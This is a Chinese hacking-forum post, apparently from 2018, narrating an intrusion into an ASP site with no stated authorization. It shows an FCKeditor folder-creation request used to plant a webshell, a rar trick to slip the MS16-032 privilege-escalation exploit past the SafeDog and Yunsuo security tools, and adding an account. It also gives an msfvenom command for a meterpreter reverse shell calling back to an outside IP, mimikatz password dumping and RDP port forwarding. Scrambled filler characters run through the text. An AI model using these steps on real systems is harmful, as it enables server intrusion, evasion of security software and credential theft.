找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 从getwebshell到绕过安全狗云锁提权再到利用matasploit ...
返回列表 发新帖
查看: 3318|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

' e7 X/ q2 x% @! l. }, s: v

0 Z* m4 y* I6 b7 e2 Y, p5 q! [9 d' e0 }: s7 l% |2 a5 O g2 ^/ T! H% ^( b- G; c8 O- s3 Y4 D- Q6 J/ @$ _- |4 |( J3 x8 O) x, N3 i# n# V
9 F! A$ ^4 w2 W6 t: D

, Y, I+ |2 H) G: V2 U( x" {1 S0 w
/ @5 P/ h! I) h' {+ E$ | 一、 利用getwebshell
; `6 F1 ?0 ]3 k) q1 P; M
3 l- C, g, g. _) b! R 首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
4 }, l" B+ |* r) K
* U, D( F: Y% j! L4 D y2 w6 l 222.png
2 @5 G% L1 E% e# B2 H; ?下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
/ A& T, a; l7 R: x, p& d! h 333.png
5 r6 t; [& s$ \! R 下面我们构造一个asp目录,如: ( o3 S5 p) b. K2 b7 m8 C0 k/ r

$ o" n8 n+ s' B' \7 T8 y% I" @2 u

$ ]# i/ K, }- S6 Y5 X6 t) ? http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 0 z b. ?6 q+ T: C* M' z, J: ~$ b

& T+ \( L1 O. i: V6 m+ ?( X' N

4 L" b6 [. y7 d9 m7 B- D9 m$ { 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
+ f2 U' \0 a! w( p8 `* t+ V- ]: M9 K
X& e5 M( [' H! |9 _ 一、 绕过安全狗云锁提权并且加账号
0 S s( f' b4 b" o# `' E$ y/ W+ L 444.png
8 g- R8 y' q- T: w! }, c0 @ 没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
* x' ]2 H; A/ b2 `. u
8 F$ f4 i2 H! M1 D5 F+ B3 ?如图:
, j" h+ C/ ]% T+ W/ z1 b2 z9 K 555.png
- ?# W$ {" Q2 l 然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
( G w9 U6 ]4 v2 v+ S( \. M
8 h' z# A8 t3 M; N/ s, R+ G一、 利用metasploit
( [3 H) Q: x' q; W
$ i+ B" n9 U" A2 |首先用pentestbox生成一个64位的payload如下命令
- [8 E6 {7 k, p+ S7 P
: ~+ k' u4 ^) P1 h6 m msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
. ?7 \+ m* R1 x) P8 w+ D- A
$ q% S6 u% C' ^. j4 {- h5 k/ O% r 为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
) M9 r# o* j( a1 H3 V6 \1 G1 i11.png
3 N/ M( ~+ ~; D# `7 i; U 下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
- X& K) G" E3 G& F2 Y# M5 W" r6 A 13.png
& p' |5 w0 J; x* A% R2 t 下面我们来做一个监听如下命令:
. ^. z5 P7 |( M8 Y i, S* u9 R
5 }- @( F0 R- f3 o) t; ? portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
7 v4 T+ i" l5 g2 Q3 e7 s. N7 ^18.png J$ q3 d: f% s& j# `: D- M, x

; j" s/ ~% Q- |$ l; w
0 Q h- G1 F2 @3 _

$ s Y+ H2 W- J) W6 E. G; X( j

+ n: C+ G9 U! Z4 U$ y) s
0 m% z: C5 \$ ?* K Z+ }; N
( E6 L/ \. P" f 1 p: a+ M7 [8 l

2 `' N1 I# p+ A7 t, [8 P# x0 l
/ _% B7 Y q9 P" H& e& U0 O 5 ^( j$ K) S$ ~

4 ~8 t8 H% ?# s, S& z8 N
) X# e5 o! g E! M

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表